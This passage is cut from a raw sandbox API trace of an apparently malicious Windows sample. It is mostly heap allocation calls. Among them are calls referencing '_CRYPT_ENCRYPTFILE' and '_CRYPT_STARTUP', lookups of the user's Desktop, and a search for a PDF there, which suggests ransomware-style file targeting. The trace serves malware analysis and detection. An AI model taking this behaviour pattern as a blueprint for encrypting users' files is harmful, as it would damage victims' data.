lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0142.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0142.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0142.593] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0142.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0142.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0142.593] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0142.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0142.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0142.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0142.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0142.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0142.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0142.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0142.593] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0142.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0142.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0142.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0142.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0142.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0142.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0142.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0142.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0142.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0142.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0142.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0142.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0142.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0142.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0142.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0142.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0142.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0142.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0142.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0142.594] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0142.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0142.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0142.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0142.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0142.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0142.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0142.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0142.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0142.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0142.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0142.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0142.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0142.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0142.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0142.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0142.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0142.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0142.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0142.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0142.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0142.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0142.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0142.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0142.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53770 [0142.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0142.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0142.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0142.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0142.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0142.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0142.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0142.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0142.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0142.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0142.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0142.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0142.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0142.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0142.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0142.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0142.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0142.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0142.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0142.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0142.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0142.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0142.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0142.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0142.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0142.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0142.596] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0142.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0142.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0142.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0142.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0142.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0142.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0142.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0142.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0142.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0142.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0142.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0142.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0142.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0142.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0142.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0142.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0142.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0142.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0142.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0142.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0142.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0142.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0142.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0142.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0142.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0142.597] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0142.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0142.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0142.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0142.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0142.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0142.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0142.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0142.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0142.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0142.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0142.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0142.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0142.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0142.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0142.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0142.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0142.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0142.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0142.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0142.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0142.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0142.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0142.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0142.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0142.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0142.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0142.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0142.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0142.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0142.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0142.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0142.599] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0142.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0142.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0142.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0142.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0142.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0142.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0142.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0142.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0142.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0142.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0142.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0142.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0142.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0142.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0142.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0142.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0142.600] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0142.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0142.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0142.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0142.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0142.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0142.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0142.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0142.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0142.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0142.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0142.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0142.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0142.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0142.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0142.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0142.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0142.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0142.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0142.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0142.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0142.601] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/DH-NxMw2Lrt0X14_j.pdf", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9e953d0, ftCreationTime.dwHighDateTime=0x1d5efa9, ftLastAccessTime.dwLowDateTime=0x4067da90, ftLastAccessTime.dwHighDateTime=0x1d5ed8c, ftLastWriteTime.dwLowDateTime=0x4067da90, ftLastWriteTime.dwHighDateTime=0x1d5ed8c, nFileSizeHigh=0x0, nFileSizeLow=0xa377, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="DH-NxMw2Lrt0X14_j.pdf", cAlternateFileName="DH-NXM~1.PDF")) returned 0xa87550 [0142.601] FindClose (in: hFindFile=0xa87550 | out: hFindFile=0xa87550) returned 1 [0142.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0142.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0142.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0142.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0142.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0142.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0142.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0142.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0142.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0142.602] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0142.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0142.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0142.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0142.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0142.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0142.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0142.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0142.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0142.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0142.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0142.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0142.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0142.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0142.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0142.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0142.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0142.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0142.603] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0142.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0142.603] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0142.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0142.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0142.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0142.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0142.603] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0142.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0142.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0142.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0142.603] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0142.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0142.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0142.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0142.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0142.603] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0142.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0142.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0142.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0142.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0142.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0142.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0142.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0142.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0142.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0142.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0142.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 